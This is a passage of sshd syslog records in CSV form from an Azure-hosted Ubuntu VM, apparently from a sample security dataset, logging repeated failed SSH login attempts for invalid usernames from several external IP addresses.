+10986,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:53:50,UbuntuDevEnv,2019-06-25 23:53:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,64956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10987,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:53:50,UbuntuDevEnv,2019-06-25 23:53:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.12.43,64956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.12.4,,0,
+10988,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:53:51,UbuntuDevEnv,2019-06-25 23:53:51,auth,UbuntuDevEnv,info,Failed password for invalid user abc from 138.68.12.43 port 41034 ssh2,64956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,abc,138.68.12.4,41034,,
+10989,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:53:51,UbuntuDevEnv,2019-06-25 23:53:51,auth,UbuntuDevEnv,info,Disconnected from invalid user abc 138.68.12.43 port 41034 [preauth],64956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,abc,138.68.12.4,41034,,
+10990,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:53:51,UbuntuDevEnv,2019-06-25 23:53:51,auth,UbuntuDevEnv,info,Received disconnect from 138.68.12.43 port 41034:11: Bye Bye [preauth],64956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.12.4,41034,,
+10991,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:53:51,UbuntuDevEnv,2019-06-25 23:53:51,auth,UbuntuDevEnv,info,Invalid user chiradip from 118.222.146.186 port 50874,64977,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chiradip,118.222.146.1,50874,,
+10992,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:53:52,UbuntuDevEnv,2019-06-25 23:53:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,64977,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10993,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:53:52,UbuntuDevEnv,2019-06-25 23:53:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.222.146.186,64977,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.222.146.1,,0,
+10994,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:53:54,UbuntuDevEnv,2019-06-25 23:53:53,auth,UbuntuDevEnv,info,Failed password for invalid user chiradip from 118.222.146.186 port 50874 ssh2,64977,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chiradip,118.222.146.1,50874,,
+10995,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:53:54,UbuntuDevEnv,2019-06-25 23:53:54,auth,UbuntuDevEnv,info,Disconnected from invalid user chiradip 118.222.146.186 port 50874 [preauth],64977,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chiradip,118.222.146.1,50874,,
+10996,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:53:54,UbuntuDevEnv,2019-06-25 23:53:54,auth,UbuntuDevEnv,info,Received disconnect from 118.222.146.186 port 50874:11: Bye Bye [preauth],64977,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.222.146.1,50874,,
+10997,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:54:23,UbuntuDevEnv,2019-06-25 23:54:23,auth,UbuntuDevEnv,info,Invalid user openbravo from 114.112.81.180 port 49540,65088,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,openbravo,114.112.81.1,49540,,
+10998,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:54:23,UbuntuDevEnv,2019-06-25 23:54:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,65088,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10999,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:54:23,UbuntuDevEnv,2019-06-25 23:54:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=114.112.81.180,65088,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,114.112.81.1,,0,
+11000,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:54:25,UbuntuDevEnv,2019-06-25 23:54:25,auth,UbuntuDevEnv,info,Failed password for invalid user openbravo from 114.112.81.180 port 49540 ssh2,65088,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,openbravo,114.112.81.1,49540,,
+11001,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:54:25,UbuntuDevEnv,2019-06-25 23:54:25,auth,UbuntuDevEnv,info,Disconnected from invalid user openbravo 114.112.81.180 port 49540 [preauth],65088,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,openbravo,114.112.81.1,49540,,
+11002,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:54:25,UbuntuDevEnv,2019-06-25 23:54:25,auth,UbuntuDevEnv,info,Received disconnect from 114.112.81.180 port 49540:11: Bye Bye [preauth],65088,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,114.112.81.1,49540,,
+11003,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:54:27,UbuntuDevEnv,2019-06-25 23:54:27,auth,UbuntuDevEnv,info,Invalid user office from 88.247.110.88 port 13524,65105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,office,88.247.110.8,13524,,
+11004,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:54:27,UbuntuDevEnv,2019-06-25 23:54:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,65105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11005,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:54:27,UbuntuDevEnv,2019-06-25 23:54:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=88.247.110.88,65105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,88.247.110.8,,0,
+11006,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:54:29,UbuntuDevEnv,2019-06-25 23:54:29,auth,UbuntuDevEnv,info,Failed password for invalid user office from 88.247.110.88 port 13524 ssh2,65105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,office,88.247.110.8,13524,,
+11007,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:54:29,UbuntuDevEnv,2019-06-25 23:54:29,auth,UbuntuDevEnv,info,Disconnected from invalid user office 88.247.110.88 port 13524 [preauth],65105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,office,88.247.110.8,13524,,
+11008,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:54:29,UbuntuDevEnv,2019-06-25 23:54:29,auth,UbuntuDevEnv,info,Received disconnect from 88.247.110.88 port 13524:11: Bye Bye [preauth],65105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,88.247.110.8,13524,,
+11009,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:54:33,UbuntuDevEnv,2019-06-25 23:54:32,auth,UbuntuDevEnv,info,Invalid user nou from 131.100.219.3 port 33932,65121,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nou,131.100.219.3,33932,,
+11010,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:54:33,UbuntuDevEnv,2019-06-25 23:54:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,65121,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11011,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:54:33,UbuntuDevEnv,2019-06-25 23:54:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.100.219.3,65121,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.100.219.3,,0,
+11012,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:54:35,UbuntuDevEnv,2019-06-25 23:54:34,auth,UbuntuDevEnv,info,Failed password for invalid user nou from 131.100.219.3 port 33932 ssh2,65121,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nou,131.100.219.3,33932,,
+11013,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:54:35,UbuntuDevEnv,2019-06-25 23:54:34,auth,UbuntuDevEnv,info,Received disconnect from 131.100.219.3 port 33932:11: Bye Bye [preauth],65121,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.100.219.3,33932,,
+11014,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:54:35,UbuntuDevEnv,2019-06-25 23:54:34,auth,UbuntuDevEnv,info,Disconnected from invalid user nou 131.100.219.3 port 33932 [preauth],65121,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nou,131.100.219.3,33932,,
+11015,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:55:36,UbuntuDevEnv,2019-06-25 23:55:36,auth,UbuntuDevEnv,info,Invalid user fa from 196.27.127.61 port 47546,65353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fa,196.27.127.6,47546,,
+11016,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:55:36,UbuntuDevEnv,2019-06-25 23:55:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.27.127.61,65353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.27.127.6,,0,
+11017,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:55:36,UbuntuDevEnv,2019-06-25 23:55:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,65353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11018,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:55:39,UbuntuDevEnv,2019-06-25 23:55:38,auth,UbuntuDevEnv,info,Failed password for invalid user fa from 196.27.127.61 port 47546 ssh2,65353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fa,196.27.127.6,47546,,
+11019,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:55:39,UbuntuDevEnv,2019-06-25 23:55:38,auth,UbuntuDevEnv,info,Disconnected from invalid user fa 196.27.127.61 port 47546 [preauth],65353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fa,196.27.127.6,47546,,
+11020,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:55:39,UbuntuDevEnv,2019-06-25 23:55:38,auth,UbuntuDevEnv,info,Received disconnect from 196.27.127.61 port 47546:11: Bye Bye [preauth],65353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.27.127.6,47546,,
+11021,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:55:58,UbuntuDevEnv,2019-06-25 23:55:57,auth,UbuntuDevEnv,info,Invalid user nou from 138.68.12.43 port 57222,65427,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nou,138.68.12.4,57222,,
+11022,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:55:58,UbuntuDevEnv,2019-06-25 23:55:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,65427,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11023,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:55:58,UbuntuDevEnv,2019-06-25 23:55:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.12.43,65427,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.12.4,,0,
+11024,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:56:00,UbuntuDevEnv,2019-06-25 23:56:00,auth,UbuntuDevEnv,info,Failed password for invalid user nou from 138.68.12.43 port 57222 ssh2,65427,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nou,138.68.12.4,57222,,
+11025,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:56:00,UbuntuDevEnv,2019-06-25 23:56:00,auth,UbuntuDevEnv,info,Received disconnect from 138.68.12.43 port 57222:11: Bye Bye [preauth],65427,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.12.4,57222,,
+11026,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:56:00,UbuntuDevEnv,2019-06-25 23:56:00,auth,UbuntuDevEnv,info,Disconnected from invalid user nou 138.68.12.43 port 57222 [preauth],65427,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nou,138.68.12.4,57222,,
+11027,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:56:14,UbuntuDevEnv,2019-06-25 23:56:14,auth,UbuntuDevEnv,info,Invalid user claire from 88.247.110.88 port 15509,65493,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,claire,88.247.110.8,15509,,
+11028,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:56:14,UbuntuDevEnv,2019-06-25 23:56:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,65493,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11029,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:56:14,UbuntuDevEnv,2019-06-25 23:56:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=88.247.110.88,65493,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,88.247.110.8,,0,
+11030,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:56:16,UbuntuDevEnv,2019-06-25 23:56:15,auth,UbuntuDevEnv,info,Invalid user wp-user from 114.112.81.180 port 40500,65490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wp,114.112.81.1,40500,,
+11031,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:56:16,UbuntuDevEnv,2019-06-25 23:56:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,65490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11032,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:56:16,UbuntuDevEnv,2019-06-25 23:56:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=114.112.81.180,65490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,114.112.81.1,,0,
+11033,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:56:16,UbuntuDevEnv,2019-06-25 23:56:16,auth,UbuntuDevEnv,info,Failed password for invalid user claire from 88.247.110.88 port 15509 ssh2,65493,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,claire,88.247.110.8,15509,,
+11034,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:56:16,UbuntuDevEnv,2019-06-25 23:56:16,auth,UbuntuDevEnv,info,Disconnected from invalid user claire 88.247.110.88 port 15509 [preauth],65493,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,claire,88.247.110.8,15509,,
+11035,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:56:16,UbuntuDevEnv,2019-06-25 23:56:16,auth,UbuntuDevEnv,info,Received disconnect from 88.247.110.88 port 15509:11: Bye Bye [preauth],65493,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,88.247.110.8,15509,,
+11036,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:56:18,UbuntuDevEnv,2019-06-25 23:56:17,auth,UbuntuDevEnv,info,Failed password for invalid user wp-user from 114.112.81.180 port 40500 ssh2,65490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wp,114.112.81.1,40500,,
+11037,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:56:18,UbuntuDevEnv,2019-06-25 23:56:18,auth,UbuntuDevEnv,info,Disconnected from invalid user wp-user 114.112.81.180 port 40500 [preauth],65490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wp,114.112.81.1,40500,,
+11038,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:56:18,UbuntuDevEnv,2019-06-25 23:56:18,auth,UbuntuDevEnv,info,Received disconnect from 114.112.81.180 port 40500:11: Bye Bye [preauth],65490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,114.112.81.1,40500,,
+11039,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:56:26,UbuntuDevEnv,2019-06-25 23:56:25,auth,UbuntuDevEnv,info,Connection closed by 118.89.40.174 port 58066 [preauth],65528,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.89.40.1,58066,,
+11040,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:56:50,UbuntuDevEnv,2019-06-25 23:56:50,auth,UbuntuDevEnv,info,Invalid user anne from 131.100.219.3 port 50332,65625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anne,131.100.219.3,50332,,
+11041,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:56:50,UbuntuDevEnv,2019-06-25 23:56:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.100.219.3,65625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.100.219.3,,0,
+11042,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:56:50,UbuntuDevEnv,2019-06-25 23:56:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,65625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11043,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:56:52,UbuntuDevEnv,2019-06-25 23:56:52,auth,UbuntuDevEnv,info,Failed password for invalid user anne from 131.100.219.3 port 50332 ssh2,65625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anne,131.100.219.3,50332,,
+11044,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:56:52,UbuntuDevEnv,2019-06-25 23:56:52,auth,UbuntuDevEnv,info,Received disconnect from 131.100.219.3 port 50332:11: Bye Bye [preauth],65625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.100.219.3,50332,,
+11045,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:56:52,UbuntuDevEnv,2019-06-25 23:56:52,auth,UbuntuDevEnv,info,Disconnected from invalid user anne 131.100.219.3 port 50332 [preauth],65625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anne,131.100.219.3,50332,,
